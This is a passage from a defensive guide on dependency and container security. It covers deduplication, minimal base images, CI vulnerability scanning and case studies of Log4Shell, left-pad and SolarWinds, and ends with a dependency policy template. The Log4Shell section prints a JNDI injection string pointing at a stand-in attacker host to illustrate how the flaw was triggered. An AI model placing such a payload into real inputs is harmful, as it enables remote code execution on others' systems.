    NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

Lerna and Changesets automate versioning and publishing based on semantic commits.

Dependency Deduplication

Monorepos with multiple packages can install the same dependency multiple times at different versions.

node_modules/
├── lodash@4.17.21          # Used by package A
├── packages/
│   ├── a/node_modules/
│   │   └── lodash@4.17.15  # Old version required by package A
│   └── b/node_modules/
│       └── lodash@4.17.21  # Current version used by package B

This increases bundle size and can cause runtime issues if packages interact through shared dependencies.

Deduplication strategies:

# npm
npm dedupe

# yarn
yarn dedupe

# pnpm (automatic deduplication)
pnpm install

Forcing single versions:

// package.json resolutions (yarn/pnpm)
{
  "resolutions": {
    "lodash": "4.17.21"
  }
}

// package.json overrides (npm 8.3+)
{
  "overrides": {
    "lodash": "4.17.21"
  }
}

This forces all packages to use the same version. Be cautious - if a package depends on specific behavior from an old version, forcing an upgrade can break it.

Runtime Dependencies and Container Security

Your application’s dependencies don’t end at libraries. The container base image, language runtime, and system packages are dependencies too.

Container Base Image Selection

Base image choices from least to most minimal:

1. Ubuntu/Debian: Full OS with package manager

Size: 100+ MB
Packages: Thousands available
Use case: Complex apps needing system tools
Risk: Large attack surface

2. Alpine: Minimal Linux with musl libc

Size: 5 MB
Packages: Limited but sufficient for most apps
Use case: Most containerized apps
Risk: musl libc incompatibility with some C libraries

3. Distroless: No package manager, minimal OS

Size: 10-50 MB
Packages: None (only runtime)
Use case: Security-sensitive deployments
Risk: Debugging is hard (no shell)

4. Scratch: Empty container

Size: 0 MB (only your binary)
Packages: None
Use case: Static binaries (Go, Rust)
Risk: No OS utilities at all

Security implications:

Ubuntu base image includes hundreds of packages. Each is a potential vulnerability. CVE scanners regularly find vulnerabilities in base images.

Example scan results:

$ trivy image node:18
Total: 487 (CRITICAL: 12, HIGH: 89, MEDIUM: 157, LOW: 229)

$ trivy image node:18-alpine
Total: 0 (CRITICAL: 0, HIGH: 0, MEDIUM: 0, LOW: 0)

The Alpine image has zero vulnerabilities because it contains almost nothing beyond Node.js.

Migration strategy:

# Before: Full Ubuntu base
FROM node:18
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
CMD ["node", "server.js"]

# After: Multi-stage with distroless
FROM node:18 AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
COPY . .

FROM gcr.io/distroless/nodejs18-debian11
WORKDIR /app
COPY --from=builder /app /app
CMD ["server.js"]

The distroless image has no shell, no package manager, no unnecessary binaries. Only Node.js and your app. Vulnerabilities drop dramatically.

Language Runtime Security

Your language runtime (Node.js, Python, JRE) is a dependency with its own vulnerabilities.

Node.js example:

CVE-2023-30581: Undici (Node.js HTTP client) vulnerability allowing CRLF injection. Fixed in Node 20.2.0, 18.16.1, 16.20.1.

If you’re running Node 18.15.0 in production, you’re vulnerable even if you update all npm packages. The runtime itself has the vulnerability.

Mitigation:

Pin major versions, update minors automatically:

FROM node:18
# Gets latest 18.x automatically when rebuilt

Pros: Security patches applied automatically Cons: Minor versions can introduce breaking changes

Pin exact versions, update deliberately:

FROM node:18.16.1

Pros: Predictable, controlled updates Cons: Must monitor for security updates and update manually

Use security-focused base images:

FROM chainguard/node:latest
# Chainguard maintains minimal, frequently patched images

Python example:

CVE-2023-24329: URL parsing vulnerability in Python < 3.11.3. Attackers could bypass URL blocklists.

If you’re using Python 3.10.10, your URL validation is vulnerable.

Java example:

Log4Shell affected all JRE versions because Log4j is ubiquitous in Java ecosystems. The fix required updating dependencies, but also validating which JRE version mitigated gadget chain exploits.

Runtime update schedule:

Language runtimes: Monthly rebuild to get latest patches
Critical vulnerabilities: Immediate update
Major version upgrades: Quarterly evaluation, annual migrations

Vulnerability Scanning in CI/CD

Scanning should happen before images reach production.

Trivy integration:

# GitHub Actions
- name: Build image
  run: docker build -t myapp:${{ github.sha }} .

- name: Scan for vulnerabilities
  uses: aquasecurity/trivy-action@master
  with:
    image-ref: myapp:${{ github.sha }}
    exit-code: 1  # Fail build on vulnerabilities
    severity: CRITICAL,HIGH

- name: Push image
  if: success()
  run: docker push myapp:${{ github.sha }}

This prevents vulnerable images from being pushed to registry.

Grype (alternative scanner):

- name: Scan with Grype
  run: |
    curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh
    grype myapp:${{ github.sha }} --fail-on high

Snyk container scanning:

- name: Snyk container scan
  uses: snyk/actions/docker@master
  env:
    SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
  with:
    image: myapp:${{ github.sha }}
    args: --severity-threshold=high

Handling scan failures:

Scanners will find vulnerabilities. Not all require immediate action:

Critical/High in production code paths: Block deployment, fix immediately
Critical/High in unused code: Create ticket, fix within SLA
Medium/Low: Aggregate report, fix in next sprint
False positives: Document suppression with justification

Example suppression file (Trivy):

# .trivyignore
CVE-2023-12345  # False positive: code path not used
CVE-2023-67890  # Accepted risk: no fix available, mitigated by WAF

Document why you’re suppressing. Future you (and auditors) will want to know.

Minimal Container Images

The fewer packages in your container, the fewer vulnerabilities. Ruthlessly minimize.

Multi-stage builds for size and security:

# Build stage: full tools
FROM node:18 AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
RUN npm run build

# Production stage: minimal
FROM gcr.io/distroless/nodejs18-debian11
WORKDIR /app
COPY --from=builder /app/dist ./dist
COPY --from=builder /app/node_modules ./node_modules
COPY package.json ./
CMD ["dist/server.js"]

The final image contains only runtime artifacts. Build tools, source code, and intermediate files aren’t included.

Static binary approach (Go, Rust):

# Build stage
FROM rust:1.70 AS builder
WORKDIR /app
COPY . .
RUN cargo build --release

# Production: scratch (empty container)
FROM scratch
COPY --from=builder /app/target/release/myapp /myapp
CMD ["/myapp"]

The final image is just your binary. No OS, no shell, no packages. Attack surface is minimal.

Debugging minimal containers:

Distroless and scratch images have no shell. Debugging requires ephemeral containers:

# Run debugging container with access to app filesystem
kubectl debug pod/myapp -it --image=busybox --target=myapp

# Or use debug images
docker run --rm -it --pid=container:<id> --net=container:<id> \
  nicolaka/netshoot

You get debugging tools without including them in production images.

Case Studies: Learning from Dependency Disasters

Real incidents teach lessons theory can’t.

Log4Shell: The 0-Day That Broke the Internet

December 9, 2021: CVE-2021-44228 published. Log4j, a ubiquitous Java logging library, had remote code execution via JNDI injection.

The vulnerability:

Log4j would evaluate expressions in log messages. An attacker could get ${jndi:ldap://attacker.com/Exploit} into any log message and Log4j would fetch and execute code from the attacker’s server.

Triggering it was trivial:

// User-controlled input
log.info("User logged in: {}", username);

// If username is: ${jndi:ldap://attacker.com/Exploit}
// Log4j fetches and executes Exploit.class from attacker server

Why it was so bad:

Ubiquity: Log4j is in thousands of Java applications and services
Transitive dependencies: Even if you didn’t use Log4j directly, your dependencies did
Embedded in products: Vendor products contained vulnerable Log4j (Minecraft, VMware, Cisco, etc.)
Easy to exploit: Attackers automated scans, exploits appeared within hours
Multiple patches needed: Initial fix (2.15.0) was incomplete, required three iterations

Response patterns:

Organizations that handled it well:

Had asset inventory (knew where Log4j was deployed)
Could deploy mitigations quickly (environment variables, WAF rules)
Had emergency patching process (bypassed normal change approval)
Communicated status to customers proactively

Organizations that struggled:

Didn’t know what Java applications they were running
Couldn’t identify Log4j versions in dependencies
Required weeks for change approval
Discovered vulnerable systems only after being compromised

Lessons:

Maintain SBOMs: You can’t patch what you don’t know you have
Practice emergency response: Log4Shell won’t be the last critical 0-day
Monitor transitive dependencies: Direct dependencies are just the tip of the iceberg
Have emergency procedures: Normal change control doesn’t work for active exploitation
Layer defenses: WAF rules bought time while patches were deployed

Technical mitigation timeline:

# Day 0: Emergency mitigation
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

# Day 1: Upgrade to 2.15.0
# Update all pom.xml, build.gradle with:
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.15.0</version>
</dependency>

# Day 6: 2.15.0 insufficient, upgrade to 2.16.0
# Day 11: Final fix, upgrade to 2.17.0

Organizations that could deploy these changes in hours weathered the storm. Those that needed weeks were compromised.

left-pad: The 11-Line Package That Broke npm

March 22, 2016: A developer unpublished left-pad, an 11-line npm package, from the registry. Thousands of builds failed instantly.

The package:

module.exports = function leftPad(str, len, ch) {
  str = String(str);
  ch = ch || ' ';
  var i = -1;
  len = len - str.length;
  while (++i < len) {
    str = ch + str;
  }
  return str;
};

Eleven lines of code. Depended on by Babel, React, and thousands of other packages through transitive dependencies.

What happened:

Developer published a package named kik
Kik (the company) asked npm to transfer the package name
npm transferred the package without developer consent (trademark policy)
Developer unpublished all his packages in protest, including left-pad
Thousands of builds started failing: npm ERR! 404 'left-pad' is not in the npm registry

npm’s response:

npm restored left-pad within hours and changed policies to prevent unpublishing packages with dependents. But the damage was done - the internet learned that tiny dependencies could break everything.

Lessons:

Transitive dependency risk: You depend on code you’ve never heard of
Single points of failure: One developer, one decision, global impact
Dependency pinning helps: Projects using npm-shrinkwrap.json (now package-lock.json) weren’t affected - they had exact versions cached
Vendor policies matter: npm’s unpublish policy was a systemic risk
Micro-dependencies are technical debt: Is depending on 11 lines worth the risk?

Cultural impact:

left-pad sparked debates about:

Micro-dependencies vs vendoring simple code
npm’s role as critical infrastructure
Developer rights vs ecosystem stability
The bus factor of open source maintenance

Many developers started questioning whether importing a library for simple functionality was worth the dependency risk. Others defended composition of small, tested modules.

Both perspectives are valid. The lesson is to make conscious choices, not default to installing packages for everything.

SolarWinds: Supply Chain Attack in the Wild

December 2020: SolarWinds Orion software contained malware distributed through official updates. It’s considered one of the most sophisticated supply chain attacks ever.

The attack:

Attackers compromised SolarWinds build system (exact method unclear, likely credential theft or insider access)
Injected malicious code into Orion software updates
Malware was digitally signed with SolarWinds’ legitimate certificate
18,000 organizations installed the compromised update
Attackers selected ~100 high-value targets for deeper exploitation
Victims included US government agencies, Fortune 500 companies, security firms

Why it worked:

Trust in vendor updates: Organizations trust signed updates from legitimate vendors. SolarWinds’ signature was valid.

Build system compromise: The attack occurred during build, not in source code. Code reviews wouldn’t have caught it.

Subtle persistence: The malware laid dormant for weeks, then communicated via legitimate-looking DNS queries.

Good operational security: Attackers used VPNs, rotating infrastructure, and careful target selection to avoid detection.

Lessons for dependency management:

Vendor code is still third-party code: Trust but verify, even for commercial software
Build system security is critical: Compromise at build time defeats source code audits
Behavioral monitoring matters: Static analysis won’t catch sophisticated runtime behavior
Network segmentation limits blast radius: The malware tried to access cloud services; segmented networks reduced impact
Incident response capabilities: Organizations with good logging and monitoring detected anomalies faster

What changed:

Executive Order 14028 (US): Mandated SBOMs for government software
Increased focus on software supply chain security
Adoption of SLSA framework
Renewed interest in reproducible builds and build provenance
Vendor security questionnaires now ask about build system security

Practical implications:

Even if you’re not a government contractor, SolarWinds-style attacks affect everyone:

Your monitoring tools could be compromised
Your CI/CD tools could be compromised
Your vendors’ update mechanisms could be compromised

Mitigations:

Monitor outbound connections for unexpected behavior
Segment networks so compromised workstations can’t access everything
Review SBOMs for unexpected dependencies
Maintain offline backups immune to network-based compromise
Practice incident response for supply chain scenarios

Putting It All Together: A Dependency Review Framework

Systematic dependency review requires checklists, tooling, and processes.

Initial Dependency Assessment

Before adding a new dependency:

1. Necessity check:

Can I implement this in reasonable time?
What’s the maintenance burden of implementing vs depending?
Is this dependency doing something complex or something trivial?

Rule of thumb: If you can implement it in under 100 lines and it’s not security-critical (crypto, auth), consider implementing it. If it’s complex (OAuth, image processing, PDF generation), depend on a library.

2. Quality evaluation:

Stars/downloads: Popularity indicates community scrutiny
Recent commits: Active maintenance or abandoned?
Open issues: Responsiveness to bugs and security reports?
Dependencies: What are you transitively importing?
Bundle size: Is this pulling in massive dependencies for simple functionality?

3. Security assessment:

Known vulnerabilities: Run npm audit or Snyk scan
Security policy: Does the project have a SECURITY.md with disclosure process?
Security track record: History of vulnerabilities and response quality
Code quality: Brief review for obvious issues (eval, SQL injection, etc.)

4. Legal review:

License type: Compatible with your project?
License propagation: Will this force your code to change licenses?
Patent clauses: Apache 2.0 has patent grant, others don’t
Commercial restrictions: Some licenses prohibit commercial use

5. Maintenance considerations:

Breaking change frequency: Stable API or constant churn?
Migration path: If we need to replace this, how hard is it?
Alternative libraries: Backup options if this gets abandoned?
Bus factor: How many active maintainers?

Ongoing Monitoring

Dependencies aren’t fire-and-forget. Continuous monitoring prevents drift into dangerous states.

Weekly:

Review Dependabot/Renovate PRs
Triage new security advisories
Merge automated patch updates that passed CI

Monthly:

Scan for new vulnerabilities across all environments
Review dependency update policy effectiveness
Update pinned dependencies to latest stable

Quarterly:

Full dependency audit: are we still using everything?
License compliance check
Evaluate new alternatives for problematic dependencies
Review vendor SLAs and usage approaching limits

Annually:

Major version update planning
Dependency reduction effort (remove unused, consolidate duplicates)
Legal review for license compliance
Vendor contract renewals and SLA renegotiation

Dependency Policy Template

Establish clear policies so developers know what’s acceptable:

# Dependency Policy

## Approval Requirements

**Auto-approved:**
- Permissive licenses (MIT, Apache 2.0, BSD, ISC)
- High-quality packages (>100k downloads/week, active maintenance)
- Patch/minor updates to existing dependencies

**Requires review:**
- New direct dependencies
- Major version updates
- Weak copyleft licenses (LGPL, MPL) - must be dynamically linked
- Commercial/proprietary dependencies

**Prohibited:**
- Strong copyleft (GPL, AGPL) in any distributed code
- Unmaintained packages (no commits in 2+ years)
- Packages with known critical vulnerabilities
- Packages without licenses

## Security Standards

**All dependencies must:**
- Have no known critical/high vulnerabilities
- Be from verified publishers (npm, Maven Central, PyPI)
- Use lock files with integrity hashes
- Pass automated security scans in CI

**Critical dependencies must:**
- Have multiple active maintainers
- Have public security disclosure process
- Be monitored for security advisories
- Have documented alternatives if replacement needed

## Operational Requirements

**Developers must:**
- Document why each dependency was chosen
- Update dependencies monthly
- Respond to Dependabot security PRs within 48 hours
- Test updates in staging before production

**CI must:**
- Run vulnerability scans on every build
- Block deployment of critical/high vulnerabilities
- Generate SBOM for each release
- Verify license compliance

Adapt this to your organization’s risk tolerance and regulatory requirements.

Final Thoughts

Dependency management is risk management. Every dependency is a trade-off: functionality and velocity in exchange for coupling, security surface, and maintenance burden.

The developers who handle this well aren’t the ones who avoid dependencies - that’s impractical in modern software development. They’re the ones who:

Make conscious choices about what they depend on
Maintain visibility into their dependency graph
Have systems to respond when dependencies fail or become compromised
Balance risk against pragmatism

You don’t need to achieve SLSA 4 or scan every single dependency of every dependency. You need to know what you depend on, monitor for critical vulnerabilities, and respond quickly when necessary.

The incidents that make headlines - Log4Shell, left-pad, SolarWinds - weren’t caused by sophisticated attacks that no one could prevent. They succeeded because organizations didn’t know what they were running, couldn’t respond quickly, or had no emergency procedures.

Build those capabilities. Maintain your inventory. Practice your response. Make dependency review a discipline, not a checklist you ignore until something breaks.

Your dependencies are your supply chain. Treat them with the same rigor you treat any other operational risk.